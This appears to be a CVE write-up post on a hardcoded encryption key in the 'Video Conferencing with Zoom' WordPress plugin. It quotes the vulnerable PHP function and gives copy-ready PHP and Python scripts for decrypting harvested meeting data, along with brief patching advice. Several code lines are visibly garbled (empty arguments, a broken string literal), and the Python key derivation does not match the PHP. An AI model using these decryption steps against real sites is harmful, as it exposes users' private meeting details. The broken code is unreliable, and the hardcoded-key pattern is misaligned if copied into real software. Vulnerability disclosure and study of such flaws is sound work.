CVE CyberSecurity Database News

CVE-2023-3947 - Sensitive Information Exposure in WordPress Zoom Plugin (with Code and Exploit Details)

Poster -

Disclaimer: This post is for educational purposes only. Do not use this information for unauthorized or malicious activity.


The Video Conferencing with Zoom plugin for WordPress is a popular tool that helps website owners schedule and manage Zoom meetings straight from their WordPress dashboard. But like many plugins, vulnerabilities can be discovered that put data and users at risk.

In this post, we’ll dive into CVE-2023-3947—a security issue where the plugin exposes sensitive Zoom meeting information due to a hardcoded encryption key.

Let’s break down what happened, see how it works, look at some code, and explore potential exploits.

What is CVE-2023-3947?

CVE-2023-3947 affects the "Video Conferencing with Zoom" WordPress plugin. Versions up to (and including) 4.2.1 contain a critical flaw: a hardcoded (fixed and public) encryption key is used in the vczapi_encrypt_decrypt function.

The Problem: Hardcoded Encryption Key

Plugins that handle sensitive information should protect it with strong, private encryption keys. In this case, the key is the same for everyone and written right into the source code.

Here’s a snippet (simplified)

function vczapi_encrypt_decrypt($string, $action = 'encrypt') {
    $secret_key = '123456789abcdefghijklmnopqrstuvwxyz'; // This is the hardcoded key
    $output = false;
    $encrypt_method = "AES-256-CBC";
    $key = hash('sha256', $secret_key);
    $iv = substr(hash('sha256', $secret_key), , 16);

    if ($action == 'encrypt') {
        $output = base64_encode(openssl_encrypt($string, $encrypt_method, $key, , $iv));
    } else if($action == 'decrypt'){
        $output = openssl_decrypt(base64_decode($string), $encrypt_method, $key, , $iv);
    }
    return $output;
}

Any attacker who grabs the plugin source code can see this key and IV, and can then decrypt any information encrypted using this scheme.

Harvest the Encrypted Data:

- Many WordPress sites expose encrypted Zoom meeting details via the plugin’s shortcodes, REST endpoints, or API responses.

Use the Hardcoded Key to Decrypt:

- Since the key and IV are public, anyone can write a script (in PHP, Python, etc.) to decrypt these values.

Anyone can copy this code to decrypt the data

function decrypt_zoom_data($encrypted) {
    $secret_key = '123456789abcdefghijklmnopqrstuvwxyz';
    $encrypt_method = "AES-256-CBC";
    $key = hash('sha256', $secret_key);
    $iv = substr(hash('sha256', $secret_key), , 16);

    return openssl_decrypt(base64_decode($encrypted), $encrypt_method, $key, , $iv);
}

// Usage:
$encrypted_meeting_id = "bz2lK1W35iDtZfVREP3kUg==";
$decrypted_meeting_id = decrypt_zoom_data($encrypted_meeting_id);
echo "Decrypted Meeting ID: " . $decrypted_meeting_id . "\n";

Or, for those who prefer Python (using pycryptodome)

from Crypto.Cipher import AES
from Crypto.Hash import SHA256
import base64

def decrypt_zoom_data(encrypted):
    secret_key = b'123456789abcdefghijklmnopqrstuvwxyz'
    key = SHA256.new(secret_key).digest()
    iv = SHA256.new(secret_key).digest()[:16]
    cipher = AES.new(key, AES.MODE_CBC, iv)
    decrypted = cipher.decrypt(base64.b64decode(encrypted))
    return decrypted.rstrip(b"\").decode()

encrypted_meeting_id = 'bz2lK1W35iDtZfVREP3kUg=='
print("Decrypted Meeting ID:", decrypt_zoom_data(encrypted_meeting_id))

Original References

- WPScan Report for CVE-2023-3947
- NVD - CVE-2023-3947 Entry
- Plugin Source Code (GitHub) (for illustration only)

What Should Site Owners Do?

- Update Immediately: Upgrade "Video Conferencing with Zoom" to the latest version (the issue was fixed after 4.2.1).

Check Your Site and Logs for suspicious access.

Vendor Fix: Later versions now use a unique key per installation, and do not expose encryption keys in code.

Summary

CVE-2023-3947 is a simple but severe bug: a hardcoded key means zero actual encryption security. Attackers need only a plugin copy to decrypt any user’s sensitive meeting information.

Stay secure and always keep your WordPress plugins up to date.

*If you found this write-up helpful or have more questions about WordPress security, feel free to leave a comment!*


References:
1. WPScan CVE-2023-3947
2. NVD Entry
3. GitHub Plugin Code
4. Plugin Page on wordpress.org

Timeline

Published on: 07/26/2023 04:15:00 UTC
Last modified on: 08/02/2023 19:37:00 UTC